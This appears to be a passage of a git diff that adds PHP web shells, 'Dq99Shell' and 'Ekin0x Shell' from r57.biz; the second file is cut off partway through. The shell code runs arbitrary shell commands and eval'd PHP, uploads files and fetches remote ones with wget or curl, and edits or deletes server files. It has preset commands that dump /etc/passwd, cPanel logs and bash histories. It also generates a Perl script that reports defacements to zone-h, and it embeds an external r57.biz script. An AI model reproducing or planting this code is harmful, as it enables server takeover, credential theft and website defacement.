+.shell {background-color:#000000;color:#00FF00;padding:5px;font-size:12;}
+.fxerrmsg {color:red; font-weight:bold;}
+#pagebar,#pagebar p,h1,h2,h3,h4,form {margin:0;}
+#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#4A4A4A;}
+.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
+textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
+input[type="label"] { text-align:right;}
+.info,.info td,input[type="label"] {border:0;background:none;}
+</style>
+';
+$html_start = '
+<html><head>
+<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
+'.$style.'
+</head>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<body>
+<div class=bartitle><h4>'.sh_name().'</h4>.: r57.biz Dq99Shell :.</div>
+';
+return $html_start;
+};
+function footer() {
+  echo "<div class=bartitle colspan=2><font size=1 color=#00FF00> By www.r57.biz, © 2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds</font></div>";
+}
+chdir($lastdir); dQ99shexit();
+?>
\ No newline at end of file
diff --git a/php/ekin0x.php b/php/ekin0x.php
new file mode 100644
index 0000000..1ae3a10
--- /dev/null
+++ b/php/ekin0x.php
@@ -0,0 +1,607 @@
+<?               
+/*########################################### 
+Ekin0x Shell volume 2.1S
+
+r57.biz
+###########################################*/
+
+error_reporting(0); 
+set_magic_quotes_runtime(0);
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
+if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
+elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
+else{return $requ."?".$link."=".$val;}}
+function delm($delmtxt){print"<center><table bgcolor=Black  style='border:1px solidDeepSkyBlue  ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
+function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
+$nscmd=htmlspecialchars($scmd);print $nscmd;}
+elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
+$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
+elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
+while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
+print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ 
+ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
+ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
+print htmlspecialchars($pret);}}
+function input($type,$name,$value,$size)
+{if (empty($value)){print "<input type=$type name=$name size=$size>";}
+elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
+elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
+else {print "<input type=$type name=$name value=$value size=$size >";}}
+function permcol($path){if (is_writable($path)){print "<font color=red>";
+callperms($path); print "</font>";}
+elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue  >";
+callperms($path); print "</font>";}
+else {print "<font color=DeepSkyBlue >";callperms($path);}}
+if ($dlink=="dwld"){download($_REQUEST['dwld']);}
+function download($dwfile) {$size = filesize($dwfile);
+@header("Content-Type: application/force-download;name=$dwfile");
+@header("Content-Transfer-Encoding: binary");
+@header("Content-Length: $size");
+@header("Content-Disposition: attachment; filename=$dwfile");
+@header("Expires: 0");
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Pragma: no-cache");
+@readfile($dwfile); exit;}
+?>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<html> 
+<head><title>Ekin0x Shell</title></head>
+<style> 
+BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; } 
+a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
+a:hover{color:red}
+input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
+textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
+div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue  smoke}
+select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style> 
+<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3> 
+</body> 
+</html> 
+<?
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
+$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=DeepSkyBlue  >";$efnt="</font>";
+################# Ending of common variables ########################
+
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue   size=6>    ## Ekin0x Shell ## 
+</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
+print " - <a href='javascript:history.back()'>Geri</a>";
+print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
+if ($dlink=='phpinfo'){print phpinfo();die();}
+print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
+print " - <a href=".inclink('dlink', 'urld').">Url decode</a>"; 
+print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>"; 
+print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
+print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
+print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
+print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
+print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
+print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
+print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
+if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));  
+print "<p>Result is : $sfnt".$cbase."$efnt";  die();}
+if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>"; 
+print $sf;input ("text","ncbase",$ncbase,35);print " "; 
+input ("submit","","Decode","");print $ef; die();}
+if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));  
+print "<p>Result is : $sfnt".$urldc."$efnt";  die();}if ($dlink=='urld'){
+print "<p><b>[ Url - Decoder ]</b>";   print $sf;
+input ("text","nurld",$nurld,35);print " "; 
+input ("submit","","Decode","");print $ef; die();}
+if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));  print "<p>Result is : $sfnt".$urlenc."$efnt";  die();}
+if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";   
+print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
+if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));  
+print "<p>Result is : $sfnt".$mdfe."$efnt";  die();}if ($dlink=='mdf'){ 
+print "<p><b>[ MD5 - Encoder ]</b>"; 
+print $sf;input ("text","nmdf",$nmdf,35);print " ";
+input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
+print "<pre>";print "<p><textarea cols=120 rows=12>";
+if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
+}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
+}print "</textarea>";print "</pre>";die();}
+function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
+print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
+elseif(isset($showsc)&&filesize($showsc) !=="0") {
+print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
+if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
+print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
+input ("text","showsc","",35);print " ";
+input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
+if ($dlink=='cmdhlp'){
+print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
+input ("text","hlp","",35);print " "; 
+input ("submit","","Help","");print $ef; die();}
+if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
+print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
+$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
+if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
+if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
+{if (touch ($_REQUEST['indx'])==true){
+$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
+fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
+] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
+if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
+Your index contents here</textarea></p>";
+input ("text","indx","Index-name",35);print " ";
+input ("submit","qindsub","Create","");print $ef;die();}
+if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
+$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
+if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
+if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
+Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
+input ("submit","mailsub","Send-mail","");print $ef;die();}
+if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
+function callzone($nscdir){
+if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
+else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
+fwrite ($fpz,"\$arq = @ARGV[0];
+\$grupo = @ARGV[1];
+chomp \$grupo;
+open(a,\"<\$arq\");
+@site = <a>;
+close(a);
+\$b = scalar(@site);
+for(\$a=0;\$a<=\$b;\$a++)
+{chomp \$site[\$a];
+if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
+print \"[+] Sending \$site[\$a]\n\";
+use IO::Socket::INET;
+\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
+print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
+print \$sock \"Accept: */*\r\n\";
+print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
+print \$sock \"Accept-Language: pt-br\r\n\";
+print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
+print \$sock \"Connection: Keep-Alive\r\n\";
+print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
+print \$sock \"Host: old.zone-h.org\r\n\";
+print \$sock \"Content-Length: 385\r\n\";
+print \$sock \"Pragma: no-cache\r\n\";
+print \$sock \"\r\n\";
+print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
+close(\$sock);}");
+if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
+}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "[ Can't complete the operation !! ]";}
+else {callfuncs("chmod 777 $zpl;chmod 777 $li");
+ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
+print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
+}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
+print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
+www.site1.com
+www.site2.com
+</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
+input ("submit","zonesub","Send","");print $ef;die();}
+print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+function inisaf($iniv) { $chkini=ini_get($iniv);
+if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
+print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
+if ($chkin==""){print " <font color=red><b>None</b></font>";}
+else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue  >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
+elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
+while (!feof($opop)){ $nval= fgetc($opop);}}
+elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
+ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
+if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
+else{print"<font color=DeepSkyBlue  ><b>OFF</b></font>";} }
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; 
+print"<tr><td>"; print"<center><br>";
+print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>"; 
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>"; 
+print "<div align=center>"; print"<br><b>Mysql : </b>"; 
+callocmd('which mysql','/usr/bin/mysql'); 
+print"</td>"; print"<td>"; print"<br><b>Perl : </b>"; 
+callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>"; 
+callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>"; 
+print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>"; 
+callocmd('which GET','/usr/bin/GET'); 
+print"</td>"; print"<td>";print"<br><b>Wget : </b>"; 
+callocmd('which wget','/usr/bin/wget'); 
+print"</td>"; print"<td>"; print"<br><b>Lynx : </b>"; 
+callocmd('which lynx','/usr/bin/lynx'); 
+print"</td>"; print "</tr></table>"; }print "<hr><br>"; 
+print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>"; 
+print "<b>Server IP : ".$SERVER_ADDR."</b>";
+print"<br><b>".$SERVER_SIGNATURE."</b>"; 
+print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>"; 
+print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
+print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>"; 
+if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print php_uname(); print "/";print PHP_OS;}
+else {callfuncs('uname -a');}}print"<br>"; 
+print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
+print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
+print"<br>";print "Shell'in Burda : " .__file__;
+print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
+print"Bos Alan: "; readable_size(disk_free_space($nscdir));
+print "</center><br></font>"; print"</td></tr></table><br>"; 
+if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); 
+if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
+else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) 
+{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} 
+else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ 
+$ncfile=trim($_REQUEST['cfile']);
+if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} 
+else{ $mess3= "Dosya Olustur/Sil";}}
+elseif(isset($_REQUEST['delfile'])){ 
+$ndfile=trim($_REQUEST['cfile']); 
+if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} 
+else {$mess3= "Dosya Olustur/Sil";}} 
+else {$mess3="Dosya Olustur/Sil";}
+class upload{ function upload($file,$tmp){ 
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
+if (@copy($tmp,$nscdir."/".$file)){ 
+print "<div><center><b>:<font color=DeepSkyBlue  > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } } 
+$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
+$ustname=trim ($_REQUEST['ustname']);ob_start();
+if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
+if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
+if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
+if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
+if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
+if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
+if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
+if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
+!isset($_REQUEST['rfiletxt'])){
+if ($dh  = dir($nscdir)){ while (true == ($filename =$dh->read())){ 
+$files[] = $filename; sort($files);}print "<br>"; 
+print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>"; 
+print "<tr><td width=43% style=\"border:1px solid black\">"; 
+print "<center><b>Dosyalar";print "</td>"; 
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>"; 
+print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>"; 
+print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>"; 
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>"; 
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
+print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){ 
+if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
+if (is_writable("$nscdir/$nfiles")){ 
+$scmess2= "<center><font color=DeepSkyBlue  >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){ 
+$scmess3= "<center><font color=DeepSkyBlue  >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue  >Dosya";} 
+print"<tr><td style=\"border:1px solid black\">"; 
+if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue  >[ $nfiles    ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
+print"</td>"; print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 color=#dadada>";
+if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
+elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
+print "</td>"; print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess2"; print "</td>"; 
+print"<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess3"; print "</td>"; 
+print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
+print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>";  print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
+if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
+print "<td style=\"border:1px solid black\">";
+print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
+print "</center>";print"</td>";} 
+print "<td style=\"border:1px solid DeepSkyBlue  \">";print "<center><div>";
+permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>"; 
+}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
+elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
+if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
+print "<pre><center>".$sta;
+if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
+elseif(isset($_REQUEST['eval'])){
+ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
+$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
+elseif (isset($_REQUEST['subqcmnds'])){
+if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
+if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
+if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
+if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
+if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
+if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
+if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
+if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
+if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
+if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
+if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
+}print $eta."</center></pre>";}
+function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
+if(is_readable($rfile)&&is_file($rfile)){ 
+$fp=fopen ($rfile,"r");print"<center>";
+print "<div><b>[ Editing <font color=DeepSkyBlue  >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>"; 
+print $sf."<textarea cols=157 rows=23 name=rfiletxt>"; 
+while (!feof($fp)){$lines = fgetc($fp);
+$nlines=htmlspecialchars($lines);print $nlines;}
+fclose($fp);print "</textarea>";if (is_writable($rfile)){
+print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else 
+{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue  >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
+elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
+function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
+if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
+$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
+fwrite ($rffp,$rfiletxt);print "<div><b><center>
+[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
+[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
+</center></b></div><br>";fclose($rffp);}
+else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}} 
+if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
+elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
+function callperms($chkperms){
+$perms = fileperms($chkperms);
+
+if (($perms & 0xC000) == 0xC000) {
+   // Socket
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   // Symbolic Link
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   // Regular
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   // Block special
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   // Directory
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   // Character special
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   // FIFO pipe
+   $info = 'p';
+} else {
+   // Unknown
+   $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
